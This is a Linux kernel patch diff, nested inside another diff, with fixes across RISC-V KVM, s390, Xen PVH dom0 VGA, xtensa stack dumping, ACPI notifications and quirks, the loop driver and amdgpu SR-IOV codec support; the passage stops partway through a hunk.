+diff --git a/arch/riscv/kvm/vcpu_timer.c b/arch/riscv/kvm/vcpu_timer.c
+index ad34519c8a13d..3ac2ff6a65dac 100644
+--- a/arch/riscv/kvm/vcpu_timer.c
++++ b/arch/riscv/kvm/vcpu_timer.c
+@@ -147,10 +147,8 @@ static void kvm_riscv_vcpu_timer_blocking(struct kvm_vcpu *vcpu)
+ 		return;
+ 
+ 	delta_ns = kvm_riscv_delta_cycles2ns(t->next_cycles, gt, t);
+-	if (delta_ns) {
+-		hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
+-		t->next_set = true;
+-	}
++	hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
++	t->next_set = true;
+ }
+ 
+ static void kvm_riscv_vcpu_timer_unblocking(struct kvm_vcpu *vcpu)
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
+index b3235ab0ace83..ed646c583e4fe 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -162,7 +162,7 @@ vdso_prepare: prepare0
+ 
+ ifdef CONFIG_EXPOLINE_EXTERN
+ modules_prepare: expoline_prepare
+-expoline_prepare:
++expoline_prepare: scripts
+ 	$(Q)$(MAKE) $(build)=arch/s390/lib/expoline arch/s390/lib/expoline/expoline.o
+ endif
+ endif
+diff --git a/arch/s390/lib/uaccess.c b/arch/s390/lib/uaccess.c
+index 720036fb19242..d44214072779e 100644
+--- a/arch/s390/lib/uaccess.c
++++ b/arch/s390/lib/uaccess.c
+@@ -172,7 +172,7 @@ unsigned long __clear_user(void __user *to, unsigned long size)
+ 		"4: slgr  %0,%0\n"
+ 		"5:\n"
+ 		EX_TABLE(0b,2b) EX_TABLE(6b,2b) EX_TABLE(3b,5b) EX_TABLE(7b,5b)
+-		: "+a" (size), "+a" (to), "+a" (tmp1), "=a" (tmp2)
++		: "+&a" (size), "+&a" (to), "+a" (tmp1), "=&a" (tmp2)
+ 		: "a" (empty_zero_page), [spec] "d" (spec.val)
+ 		: "cc", "memory", "0");
+ 	return size;
+diff --git a/arch/x86/xen/Makefile b/arch/x86/xen/Makefile
+index 3c5b52fbe4a7f..a9ec8c9f5c5dd 100644
+--- a/arch/x86/xen/Makefile
++++ b/arch/x86/xen/Makefile
+@@ -45,6 +45,6 @@ obj-$(CONFIG_PARAVIRT_SPINLOCKS)+= spinlock.o
+ 
+ obj-$(CONFIG_XEN_DEBUG_FS)	+= debugfs.o
+ 
+-obj-$(CONFIG_XEN_PV_DOM0)	+= vga.o
++obj-$(CONFIG_XEN_DOM0)		+= vga.o
+ 
+ obj-$(CONFIG_XEN_EFI)		+= efi.o
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 5b13796628770..68f5f5d209dfa 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -1389,7 +1389,8 @@ asmlinkage __visible void __init xen_start_kernel(struct start_info *si)
+ 
+ 		x86_platform.set_legacy_features =
+ 				xen_dom0_set_legacy_features;
+-		xen_init_vga(info, xen_start_info->console.dom0.info_size);
++		xen_init_vga(info, xen_start_info->console.dom0.info_size,
++			     &boot_params.screen_info);
+ 		xen_start_info->console.domU.mfn = 0;
+ 		xen_start_info->console.domU.evtchn = 0;
+ 
+diff --git a/arch/x86/xen/enlighten_pvh.c b/arch/x86/xen/enlighten_pvh.c
+index bcae606bbc5cf..ada3868c02c23 100644
+--- a/arch/x86/xen/enlighten_pvh.c
++++ b/arch/x86/xen/enlighten_pvh.c
+@@ -43,6 +43,19 @@ void __init xen_pvh_init(struct boot_params *boot_params)
+ 	x86_init.oem.banner = xen_banner;
+ 
+ 	xen_efi_init(boot_params);
++
++	if (xen_initial_domain()) {
++		struct xen_platform_op op = {
++			.cmd = XENPF_get_dom0_console,
++		};
++		int ret = HYPERVISOR_platform_op(&op);
++
++		if (ret > 0)
++			xen_init_vga(&op.u.dom0_console,
++				     min(ret * sizeof(char),
++					 sizeof(op.u.dom0_console)),
++				     &boot_params->screen_info);
++	}
+ }
+ 
+ void __init mem_map_via_hcall(struct boot_params *boot_params_p)
+diff --git a/arch/x86/xen/vga.c b/arch/x86/xen/vga.c
+index 14ea32e734d59..d97adab8420f4 100644
+--- a/arch/x86/xen/vga.c
++++ b/arch/x86/xen/vga.c
+@@ -9,10 +9,9 @@
+ 
+ #include "xen-ops.h"
+ 
+-void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size)
++void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size,
++			 struct screen_info *screen_info)
+ {
+-	struct screen_info *screen_info = &boot_params.screen_info;
+-
+ 	/* This is drawn from a dump from vgacon:startup in
+ 	 * standard Linux. */
+ 	screen_info->orig_video_mode = 3;
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index 9a8bb972193d8..a10903785a338 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -108,11 +108,12 @@ static inline void xen_uninit_lock_cpu(int cpu)
+ 
+ struct dom0_vga_console_info;
+ 
+-#ifdef CONFIG_XEN_PV_DOM0
+-void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size);
++#ifdef CONFIG_XEN_DOM0
++void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size,
++			 struct screen_info *);
+ #else
+ static inline void __init xen_init_vga(const struct dom0_vga_console_info *info,
+-				       size_t size)
++				       size_t size, struct screen_info *si)
+ {
+ }
+ #endif
+diff --git a/arch/xtensa/kernel/traps.c b/arch/xtensa/kernel/traps.c
+index cd98366a9b238..f0a7d1c2641e0 100644
+--- a/arch/xtensa/kernel/traps.c
++++ b/arch/xtensa/kernel/traps.c
+@@ -539,7 +539,7 @@ static size_t kstack_depth_to_print = CONFIG_PRINT_STACK_DEPTH;
+ 
+ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ {
+-	size_t len;
++	size_t len, off = 0;
+ 
+ 	if (!sp)
+ 		sp = stack_pointer(task);
+@@ -548,9 +548,17 @@ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ 		  kstack_depth_to_print * STACK_DUMP_ENTRY_SIZE);
+ 
+ 	printk("%sStack:\n", loglvl);
+-	print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
+-		       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
+-		       sp, len, false);
++	while (off < len) {
++		u8 line[STACK_DUMP_LINE_SIZE];
++		size_t line_len = len - off > STACK_DUMP_LINE_SIZE ?
++			STACK_DUMP_LINE_SIZE : len - off;
++
++		__memcpy(line, (u8 *)sp + off, line_len);
++		print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
++			       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
++			       line, line_len, false);
++		off += STACK_DUMP_LINE_SIZE;
++	}
+ 	show_trace(task, sp, loglvl);
+ }
+ 
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index 0c05ccde1f7a6..7c16bc15e7a14 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -459,85 +459,67 @@ out_free:
+                              Notification Handling
+    -------------------------------------------------------------------------- */
+ 
+-/*
+- * acpi_bus_notify
+- * ---------------
+- * Callback for all 'system-level' device notifications (values 0x00-0x7F).
++/**
++ * acpi_bus_notify - Global system-level (0x00-0x7F) notifications handler
++ * @handle: Target ACPI object.
++ * @type: Notification type.
++ * @data: Ignored.
++ *
++ * This only handles notifications related to device hotplug.
+  */
+ static void acpi_bus_notify(acpi_handle handle, u32 type, void *data)
+ {
+ 	struct acpi_device *adev;
+-	u32 ost_code = ACPI_OST_SC_NON_SPECIFIC_FAILURE;
+-	bool hotplug_event = false;
+ 
+ 	switch (type) {
+ 	case ACPI_NOTIFY_BUS_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_BUS_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_WAKE:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_WAKE event\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_EJECT_REQUEST:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_EJECT_REQUEST event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK_LIGHT:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK_LIGHT event\n");
+ 		/* TBD: Exactly what does 'light' mean? */
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_FREQUENCY_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a frequency mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_BUS_MODE_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a bus mode mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_POWER_FAULT:
+ 		acpi_handle_err(handle, "Device has suffered a power fault\n");
+-		break;
++		return;
+ 
+ 	default:
+ 		acpi_handle_debug(handle, "Unknown event type 0x%x\n", type);
+-		break;
++		return;
+ 	}
+ 
+ 	adev = acpi_get_acpi_dev(handle);
+-	if (!adev)
+-		goto err;
+-
+-	if (adev->dev.driver) {
+-		struct acpi_driver *driver = to_acpi_driver(adev->dev.driver);
+-
+-		if (driver && driver->ops.notify &&
+-		    (driver->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS))
+-			driver->ops.notify(adev, type);
+-	}
+-
+-	if (!hotplug_event) {
+-		acpi_put_acpi_dev(adev);
+-		return;
+-	}
+ 
+-	if (ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
++	if (adev && ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
+ 		return;
+ 
+ 	acpi_put_acpi_dev(adev);
+ 
+- err:
+-	acpi_evaluate_ost(handle, type, ost_code, NULL);
++	acpi_evaluate_ost(handle, type, ACPI_OST_SC_NON_SPECIFIC_FAILURE, NULL);
+ }
+ 
+ static void acpi_notify_device(acpi_handle handle, u32 event, void *data)
+@@ -562,42 +544,51 @@ static u32 acpi_device_fixed_event(void *data)
+ 	return ACPI_INTERRUPT_HANDLED;
+ }
+ 
+-static int acpi_device_install_notify_handler(struct acpi_device *device)
++static int acpi_device_install_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+ 	acpi_status status;
+ 
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else
+-		status = acpi_install_notify_handler(device->handle,
+-						     ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		status = acpi_install_notify_handler(device->handle, type,
+ 						     acpi_notify_device,
+ 						     device);
++	}
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return -EINVAL;
+ 	return 0;
+ }
+ 
+-static void acpi_device_remove_notify_handler(struct acpi_device *device)
++static void acpi_device_remove_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						acpi_device_fixed_event);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						acpi_device_fixed_event);
+-	else
+-		acpi_remove_notify_handler(device->handle, ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
++	}
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+@@ -1039,7 +1030,7 @@ static int acpi_device_probe(struct device *dev)
+ 		 acpi_drv->name, acpi_dev->pnp.bus_id);
+ 
+ 	if (acpi_drv->ops.notify) {
+-		ret = acpi_device_install_notify_handler(acpi_dev);
++		ret = acpi_device_install_notify_handler(acpi_dev, acpi_drv);
+ 		if (ret) {
+ 			if (acpi_drv->ops.remove)
+ 				acpi_drv->ops.remove(acpi_dev);
+@@ -1062,7 +1053,7 @@ static void acpi_device_remove(struct device *dev)
+ 	struct acpi_driver *acpi_drv = to_acpi_driver(dev->driver);
+ 
+ 	if (acpi_drv->ops.notify)
+-		acpi_device_remove_notify_handler(acpi_dev);
++		acpi_device_remove_notify_handler(acpi_dev, acpi_drv);
+ 
+ 	if (acpi_drv->ops.remove)
+ 		acpi_drv->ops.remove(acpi_dev);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 710ac640267dd..14d6d81e536fe 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -716,6 +716,13 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5515"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
++		},
++	},
+ 
+ 	/*
+ 	 * Desktops which falsely report a backlight and which our heuristics
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index e45285d4e62a4..da5727069d851 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -251,6 +251,7 @@ bool force_storage_d3(void)
+ #define ACPI_QUIRK_UART1_TTY_UART2_SKIP				BIT(1)
+ #define ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY			BIT(2)
+ #define ACPI_QUIRK_USE_ACPI_AC_AND_BATTERY			BIT(3)
++#define ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS			BIT(4)
+ 
+ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 	/*
+@@ -279,6 +280,16 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 	 *    need the x86-android-tablets module to properly work.
+ 	 */
+ #if IS_ENABLED(CONFIG_X86_ANDROID_TABLETS)
++	{
++		/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -286,7 +297,19 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+ 					ACPI_QUIRK_UART1_TTY_UART2_SKIP |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
++	},
++	{
++		/* Lenovo Yoga Book X90F/L */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		.matches = {
+@@ -294,7 +317,8 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "TF103C"),
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		/* Lenovo Yoga Tablet 2 1050F/L */
+@@ -336,7 +360,8 @@ static const struct dmi_system_id acpi_quirk_skip_dmi_ids[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M890BAP"),
+ 		},
+ 		.driver_data = (void *)(ACPI_QUIRK_SKIP_I2C_CLIENTS |
+-					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY),
++					ACPI_QUIRK_SKIP_ACPI_AC_AND_BATTERY |
++					ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS),
+ 	},
+ 	{
+ 		/* Whitelabel (sold as various brands) TM800A550L */
+@@ -413,6 +438,20 @@ int acpi_quirk_skip_serdev_enumeration(struct device *controller_parent, bool *s
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(acpi_quirk_skip_serdev_enumeration);
++
++bool acpi_quirk_skip_gpio_event_handlers(void)
++{
++	const struct dmi_system_id *dmi_id;
++	long quirks;
++
++	dmi_id = dmi_first_match(acpi_quirk_skip_dmi_ids);
++	if (!dmi_id)
++		return false;
++
++	quirks = (unsigned long)dmi_id->driver_data;
++	return (quirks & ACPI_QUIRK_SKIP_GPIO_EVENT_HANDLERS);
++}
++EXPORT_SYMBOL_GPL(acpi_quirk_skip_gpio_event_handlers);
+ #endif
+ 
+ /* Lists of PMIC ACPI HIDs with an (often better) native charger driver */
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index eabbc3bdec221..4916fe78ab8fa 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1010,9 +1010,6 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	/* This is safe, since we have a reference from open(). */
+ 	__module_get(THIS_MODULE);
+ 
+-	/* suppress uevents while reconfiguring the device */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
+-
+ 	/*
+ 	 * If we don't hold exclusive handle for the device, upgrade to it
+ 	 * here to avoid changing device under exclusive owner.
+@@ -1067,6 +1064,9 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 		}
+ 	}
+ 
++	/* suppress uevents while reconfiguring the device */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
++
+ 	disk_force_media_change(lo->lo_disk, DISK_EVENT_MEDIA_CHANGE);
+ 	set_disk_ro(lo->lo_disk, (lo->lo_flags & LO_FLAGS_READ_ONLY) != 0);
+ 
+@@ -1109,17 +1109,17 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	if (partscan)
+ 		clear_bit(GD_SUPPRESS_PART_SCAN, &lo->lo_disk->state);
+ 
++	/* enable and uncork uevent now that we are done */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
++
+ 	loop_global_unlock(lo, is_loop);
+ 	if (partscan)
+ 		loop_reread_partitions(lo);
++
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(bdev, loop_configure);
+ 
+-	error = 0;
+-done:
+-	/* enable and uncork uevent now that we are done */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
+-	return error;
++	return 0;
+ 
+ out_unlock:
+ 	loop_global_unlock(lo, is_loop);
+@@ -1130,7 +1130,7 @@ out_putf:
+ 	fput(file);
+ 	/* This is safe: open() is still holding a reference. */
+ 	module_put(THIS_MODULE);
+-	goto done;
++	return error;
+ }
+ 
+ static void __loop_clr_fd(struct loop_device *lo, bool release)
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index 34ff048e70d0e..7c9175619a1dc 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -536,6 +536,9 @@ void acpi_gpiochip_request_interrupts(struct gpio_chip *chip)
+ 	if (ACPI_FAILURE(status))
+ 		return;
+ 
++	if (acpi_quirk_skip_gpio_event_handlers())
++		return;
++
+ 	acpi_walk_resources(handle, METHOD_NAME__AEI,
+ 			    acpi_gpiochip_alloc_event, acpi_gpio);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index f873692071032..00a92e935ff0f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -981,7 +981,12 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+  */
+ bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+ {
+-	if (adev->flags & AMD_IS_APU)
++	if ((adev->flags & AMD_IS_APU) &&
++	    adev->gfx.imu.funcs) /* Not need to do mode2 reset for IMU enabled APUs */
++		return false;
++
++	if ((adev->flags & AMD_IS_APU) &&
++	    amdgpu_acpi_is_s3_active(adev))
+ 		return false;
+ 
+ 	if (amdgpu_sriov_vf(adev))
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+index 2b9d806e23afb..10a0a510910b6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.h
+@@ -123,6 +123,8 @@ enum AMDGIM_FEATURE_FLAG {
+ 	AMDGIM_FEATURE_PP_ONE_VF = (1 << 4),
+ 	/* Indirect Reg Access enabled */
+ 	AMDGIM_FEATURE_INDIRECT_REG_ACCESS = (1 << 5),
++	/* AV1 Support MODE*/
++	AMDGIM_FEATURE_AV1_SUPPORT = (1 << 6),
+ };
+ 
+ enum AMDGIM_REG_ACCESS_FLAG {
+@@ -321,6 +323,8 @@ static inline bool is_virtual_machine(void)
+ 	((!amdgpu_in_reset(adev)) && adev->virt.tdr_debug)
+ #define amdgpu_sriov_is_normal(adev) \
+ 	((!amdgpu_in_reset(adev)) && (!adev->virt.tdr_debug))
++#define amdgpu_sriov_is_av1_support(adev) \
++	((adev)->virt.gim_feature & AMDGIM_FEATURE_AV1_SUPPORT)
+ bool amdgpu_virt_mmio_blocked(struct amdgpu_device *adev);
+ void amdgpu_virt_init_setting(struct amdgpu_device *adev);
+ void amdgpu_virt_kiq_reg_write_reg_wait(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h b/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
+index 6c97148ca0ed3..24d42d24e6a01 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgv_sriovmsg.h
+@@ -93,7 +93,8 @@ union amd_sriov_msg_feature_flags {
+ 		uint32_t mm_bw_management  : 1;
+ 		uint32_t pp_one_vf_mode	   : 1;
+ 		uint32_t reg_indirect_acc  : 1;
+-		uint32_t reserved	   : 26;
++		uint32_t av1_support       : 1;
++		uint32_t reserved	   : 25;
+ 	} flags;
+ 	uint32_t all;
+ };
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 3d938b52178e3..9eedc1a1494c0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -101,6 +101,59 @@ static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_decode_vcn1 =
+ 	.codec_array = vcn_4_0_0_video_codecs_decode_array_vcn1,
+ };
+ 
++/* SRIOV SOC21, not const since data is controlled by host */
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_encode_array_vcn0[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_encode_array_vcn1[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 2304, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 2304, 0)},
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_encode_vcn0 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn0),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_encode_array_vcn0,
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_encode_vcn1 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_encode_array_vcn1),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_encode_array_vcn1,
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_decode_array_vcn0[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_AV1, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codec_info sriov_vcn_4_0_0_video_codecs_decode_array_vcn1[] = {
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_decode_vcn0 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn0),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_decode_array_vcn0,
++};
++
++static struct amdgpu_video_codecs sriov_vcn_4_0_0_video_codecs_decode_vcn1 = {
++	.codec_count = ARRAY_SIZE(sriov_vcn_4_0_0_video_codecs_decode_array_vcn1),
++	.codec_array = sriov_vcn_4_0_0_video_codecs_decode_array_vcn1,
++};
++
+ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 				 const struct amdgpu_video_codecs **codecs)
+ {
+@@ -111,16 +164,31 @@ static int soc21_query_video_codecs(struct amdgpu_device *adev, bool encode,
+ 	case IP_VERSION(4, 0, 0):
+ 	case IP_VERSION(4, 0, 2):
+ 	case IP_VERSION(4, 0, 4):
+-		if (adev->vcn.harvest_config & AMDGPU_VCN_HARVEST_VCN0) {
+-			if (encode)
+-				*codecs = &vcn_4_0_0_video_codecs_encode_vcn1;
+-			else
+-				*codecs = &vcn_4_0_0_video_codecs_decode_vcn1;
++		if (amdgpu_sriov_vf(adev)) {
